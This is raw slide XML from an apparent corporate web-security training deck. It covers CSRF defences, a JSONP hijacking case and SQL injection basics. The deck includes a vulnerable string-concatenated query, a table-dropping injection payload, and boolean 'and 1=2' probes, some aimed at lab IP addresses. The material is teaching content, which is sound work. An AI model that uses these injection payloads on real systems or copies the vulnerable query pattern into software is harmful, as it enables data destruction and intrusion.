                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>?pageSize=1&amp;pageNum=1&amp;validType=1&amp;sceneval=2&amp;_=1515479686822&amp;sceneval=2&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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callback=jsonpCBKB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>&amp;g_tk=817407019&amp;g_ty=ls</a:t>
            </a:r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504190" y="513080"/>
            <a:ext cx="686054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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年部门案例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5630" y="1160780"/>
            <a:ext cx="5183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京东支付微信公众号存在jsonp劫持漏洞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9" grpId="0"/>
      <p:bldP spid="3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4190" y="503555"/>
            <a:ext cx="6860540" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防御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方法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09190" y="1931035"/>
            <a:ext cx="680085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" y="1106805"/>
            <a:ext cx="8149590" cy="469836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8884285" y="3206115"/>
            <a:ext cx="2544445" cy="5708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http://2sdvwa.jd.com/login.php   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初始账号2sadmin，密码2sadmin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592705" y="4323715"/>
            <a:ext cx="1702435" cy="96075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" y="931545"/>
            <a:ext cx="8149590" cy="5487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4190" y="503555"/>
            <a:ext cx="6860540" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防御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方法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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669290" y="1262380"/>
            <a:ext cx="5567045" cy="4424680"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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）验证码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CSRF攻击是在用户不知情的情况下构造了网络请求。验证码强制用户必须与应用进行交互，才能完成最终请求。但是用户体验不好</a:t>
            </a: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）Referer检查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Referer检查也可以被用于检查请求是否来自合法的“源”,比如一个“论坛发帖”的操作，在提交“发帖”的表单时，Referer的值必然是发帖表单所在的页面。</a:t>
            </a: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如果Referer的值不是这个页面，甚至不是发帖网站的域，则极有可能是CSRF攻击。</a:t>
            </a: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）使用CSRF Token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CSRF攻击本质是重要操作的所有参数都是可以被攻击者猜测到的。要构造一个CSRF是要在用户不知道的情况下发出请求，既然要发出请求就要知道相关的参数，如果你连参数都不知道就没办法构造出一个请求出来。</a:t>
            </a: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http://2sdvwa.jd.com/vulnerabilities/csrf/?password_current=123&amp;password_new=123&amp;password_conf=123&amp;Change=Change&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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user_token=cb36e5e46ccaa7ceedf7d8622085fc72 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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215" y="1443355"/>
            <a:ext cx="5027295" cy="40620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275195" y="1797050"/>
            <a:ext cx="2651760" cy="24384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490970" y="3028950"/>
            <a:ext cx="2689225" cy="19748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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628015" y="1250950"/>
            <a:ext cx="7743825" cy="27292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SQL注入的典型例子</a:t>
            </a:r>
            <a:r>
              <a:rPr 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var Shipcity;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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ShipCity = Request.form ("ShipCity");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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var sql = "select ＊ from OrdersTable where ShipCity = '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 + ShipCity + "</a:t>
            </a:r>
            <a:r>
              <a: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'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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变量ShipCity的值由用户提交，在正常情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr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假如用户输入Beijing，</a:t>
            </a:r>
            <a:r>
              <a:rPr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那么SQL语句会执行</a:t>
            </a:r>
            <a:r>
              <a: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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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SELECT ＊ FROM OrdersTable WHERE ShipCity = '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Beijing</a:t>
            </a:r>
            <a:r>
              <a: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'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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但假如用户输入一段有语义的SQL语句，比如：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Beijing'; drop table OrdersTable--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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那么，SQL语句在实际执行时就会如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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SELECT ＊ FROM OrdersTable WHERE ShipCity = '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Beijing'; drop table OrdersTable--</a:t>
            </a:r>
            <a:r>
              <a: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'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628015" y="4508500"/>
            <a:ext cx="7743825" cy="1290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注入攻击的两个条件：</a:t>
            </a:r>
            <a:endParaRPr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用户能够控制数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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输入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在这里，用户能够控制变量ShipCity。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="13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原本要执行的代码，拼接了用户的输入</a:t>
            </a:r>
            <a:r>
              <a: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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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var sql = "select ＊ from OrdersTable where ShipCity = '" + ShipCity + "'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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这个“拼接”的过程很重要，正是这个拼接的过程导致了代码的注入。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920" y="2695575"/>
            <a:ext cx="1335405" cy="12172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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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布尔型注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628015" y="1466215"/>
            <a:ext cx="6221730" cy="3688080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="01437C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一个应用的URL如下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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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http://newspaper.com/items.php? id=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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执行的SQL语句为：SELECT title, description, body FROM items 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WHERE ID = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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如果攻击者构造如下的条件语句：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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http://newspaper.com/items.php? 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id=2 and 1=2</a:t>
            </a:r>
            <a:endParaRPr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实际执行的SQL语句就会变成：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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SELECT title, description, body FROM items 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WHERE ID = 2 and 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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因为“and 1=2”永远是一个假命题，所以这条SQL语句的“and”条件永远无法成立。攻击者看到的页面结果将为空或者是一个出错页面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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为了进一步确认注入是否存在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攻击者继续构造如下请求：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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http://newspaper.com/items.php? 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id=2 and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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页面返回的内容就跟正常请求一样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基本就可以判断是存在注入了。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350" y="2668905"/>
            <a:ext cx="3293110" cy="15811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345440" y="284480"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345440" y="1155065"/>
            <a:ext cx="3369310" cy="48875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打开链接http://117.41.229.122:8003/?id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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id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后面加上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and 1=2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http://120.203.13.111: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8003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/?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id=1  and 1=2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返回的页面错误了，没有文章的信息。</a:t>
            </a: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、后面的语句改成and 1=1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http://120.203.13.111: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8003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/?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id=1 and 1=1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发现返回的页面正常，到了这里基本就可以判断是存在注入了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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85" y="458470"/>
            <a:ext cx="7328535" cy="31819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985" y="3723640"/>
            <a:ext cx="7327900" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Freeform 40"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="472440" y="1390650"/>
            <a:ext cx="2212340" cy="743585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 268 w 313"/>
              <a:gd name="T1" fmla="*/ 2 h 283"/>
              <a:gd name="T2" fmla="*/ 300 w 313"/>
              <a:gd name="T3" fmla="*/ 48 h 283"/>
              <a:gd name="T4" fmla="*/ 301 w 313"/>
              <a:gd name="T5" fmla="*/ 150 h 283"/>
              <a:gd name="T6" fmla="*/ 277 w 313"/>
              <a:gd name="T7" fmla="*/ 276 h 283"/>
              <a:gd name="T8" fmla="*/ 228 w 313"/>
              <a:gd name="T9" fmla="*/ 273 h 283"/>
              <a:gd name="T10" fmla="*/ 47 w 313"/>
              <a:gd name="T11" fmla="*/ 272 h 283"/>
              <a:gd name="T12" fmla="*/ 24 w 313"/>
              <a:gd name="T13" fmla="*/ 229 h 283"/>
              <a:gd name="T14" fmla="*/ 3 w 313"/>
              <a:gd name="T15" fmla="*/ 266 h 283"/>
              <a:gd name="T16" fmla="*/ 30 w 313"/>
              <a:gd name="T17" fmla="*/ 48 h 283"/>
              <a:gd name="T18" fmla="*/ 33 w 313"/>
              <a:gd name="T19" fmla="*/ 139 h 283"/>
              <a:gd name="T20" fmla="*/ 39 w 313"/>
              <a:gd name="T21" fmla="*/ 33 h 283"/>
              <a:gd name="T22" fmla="*/ 233 w 313"/>
              <a:gd name="T23" fmla="*/ 178 h 283"/>
              <a:gd name="T24" fmla="*/ 149 w 313"/>
              <a:gd name="T25" fmla="*/ 177 h 283"/>
              <a:gd name="T26" fmla="*/ 28 w 313"/>
              <a:gd name="T27" fmla="*/ 181 h 283"/>
              <a:gd name="T28" fmla="*/ 156 w 313"/>
              <a:gd name="T29" fmla="*/ 183 h 283"/>
              <a:gd name="T30" fmla="*/ 307 w 313"/>
              <a:gd name="T31" fmla="*/ 185 h 283"/>
              <a:gd name="T32" fmla="*/ 291 w 313"/>
              <a:gd name="T33" fmla="*/ 118 h 283"/>
              <a:gd name="T34" fmla="*/ 286 w 313"/>
              <a:gd name="T35" fmla="*/ 171 h 283"/>
              <a:gd name="T36" fmla="*/ 45 w 313"/>
              <a:gd name="T37" fmla="*/ 11 h 283"/>
              <a:gd name="T38" fmla="*/ 257 w 313"/>
              <a:gd name="T39" fmla="*/ 11 h 283"/>
              <a:gd name="T40" fmla="*/ 32 w 313"/>
              <a:gd name="T41" fmla="*/ 4 h 283"/>
              <a:gd name="T42" fmla="*/ 264 w 313"/>
              <a:gd name="T43" fmla="*/ 14 h 283"/>
              <a:gd name="T44" fmla="*/ 72 w 313"/>
              <a:gd name="T45" fmla="*/ 13 h 283"/>
              <a:gd name="T46" fmla="*/ 44 w 313"/>
              <a:gd name="T47" fmla="*/ 115 h 283"/>
              <a:gd name="T48" fmla="*/ 233 w 313"/>
              <a:gd name="T49" fmla="*/ 168 h 283"/>
              <a:gd name="T50" fmla="*/ 262 w 313"/>
              <a:gd name="T51" fmla="*/ 243 h 283"/>
              <a:gd name="T52" fmla="*/ 261 w 313"/>
              <a:gd name="T53" fmla="*/ 279 h 283"/>
              <a:gd name="T54" fmla="*/ 261 w 313"/>
              <a:gd name="T55" fmla="*/ 232 h 283"/>
              <a:gd name="T56" fmla="*/ 260 w 313"/>
              <a:gd name="T57" fmla="*/ 243 h 283"/>
              <a:gd name="T58" fmla="*/ 255 w 313"/>
              <a:gd name="T59" fmla="*/ 252 h 283"/>
              <a:gd name="T60" fmla="*/ 254 w 313"/>
              <a:gd name="T61" fmla="*/ 246 h 283"/>
              <a:gd name="T62" fmla="*/ 240 w 313"/>
              <a:gd name="T63" fmla="*/ 235 h 283"/>
              <a:gd name="T64" fmla="*/ 252 w 313"/>
              <a:gd name="T65" fmla="*/ 206 h 283"/>
              <a:gd name="T66" fmla="*/ 251 w 313"/>
              <a:gd name="T67" fmla="*/ 246 h 283"/>
              <a:gd name="T68" fmla="*/ 244 w 313"/>
              <a:gd name="T69" fmla="*/ 244 h 283"/>
              <a:gd name="T70" fmla="*/ 237 w 313"/>
              <a:gd name="T71" fmla="*/ 255 h 283"/>
              <a:gd name="T72" fmla="*/ 92 w 313"/>
              <a:gd name="T73" fmla="*/ 243 h 283"/>
              <a:gd name="T74" fmla="*/ 214 w 313"/>
              <a:gd name="T75" fmla="*/ 186 h 283"/>
              <a:gd name="T76" fmla="*/ 112 w 313"/>
              <a:gd name="T77" fmla="*/ 184 h 283"/>
              <a:gd name="T78" fmla="*/ 233 w 313"/>
              <a:gd name="T79" fmla="*/ 241 h 283"/>
              <a:gd name="T80" fmla="*/ 197 w 313"/>
              <a:gd name="T81" fmla="*/ 173 h 283"/>
              <a:gd name="T82" fmla="*/ 201 w 313"/>
              <a:gd name="T83" fmla="*/ 168 h 283"/>
              <a:gd name="T84" fmla="*/ 111 w 313"/>
              <a:gd name="T85" fmla="*/ 168 h 283"/>
              <a:gd name="T86" fmla="*/ 165 w 313"/>
              <a:gd name="T87" fmla="*/ 175 h 283"/>
              <a:gd name="T88" fmla="*/ 86 w 313"/>
              <a:gd name="T89" fmla="*/ 243 h 283"/>
              <a:gd name="T90" fmla="*/ 84 w 313"/>
              <a:gd name="T91" fmla="*/ 243 h 283"/>
              <a:gd name="T92" fmla="*/ 79 w 313"/>
              <a:gd name="T93" fmla="*/ 247 h 283"/>
              <a:gd name="T94" fmla="*/ 59 w 313"/>
              <a:gd name="T95" fmla="*/ 239 h 283"/>
              <a:gd name="T96" fmla="*/ 69 w 313"/>
              <a:gd name="T97" fmla="*/ 252 h 283"/>
              <a:gd name="T98" fmla="*/ 73 w 313"/>
              <a:gd name="T99" fmla="*/ 249 h 283"/>
              <a:gd name="T100" fmla="*/ 54 w 313"/>
              <a:gd name="T101" fmla="*/ 276 h 283"/>
              <a:gd name="T102" fmla="*/ 30 w 313"/>
              <a:gd name="T103" fmla="*/ 118 h 283"/>
              <a:gd name="T104" fmla="*/ 11 w 313"/>
              <a:gd name="T105" fmla="*/ 249 h 283"/>
              <a:gd name="T106" fmla="*/ 28 w 313"/>
              <a:gd name="T107" fmla="*/ 60 h 283"/>
              <a:gd name="T108" fmla="*/ 9 w 313"/>
              <a:gd name="T109" fmla="*/ 229 h 283"/>
              <a:gd name="T110" fmla="*/ 27 w 313"/>
              <a:gd name="T111" fmla="*/ 192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13" h="283">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="1"/>
                  <a:pt x="29" y="1"/>
                  <a:pt x="31" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="1"/>
                  <a:pt x="36" y="0"/>
                  <a:pt x="39" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="1"/>
                  <a:pt x="43" y="1"/>
                  <a:pt x="45" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="1"/>
                  <a:pt x="124" y="2"/>
                  <a:pt x="171" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
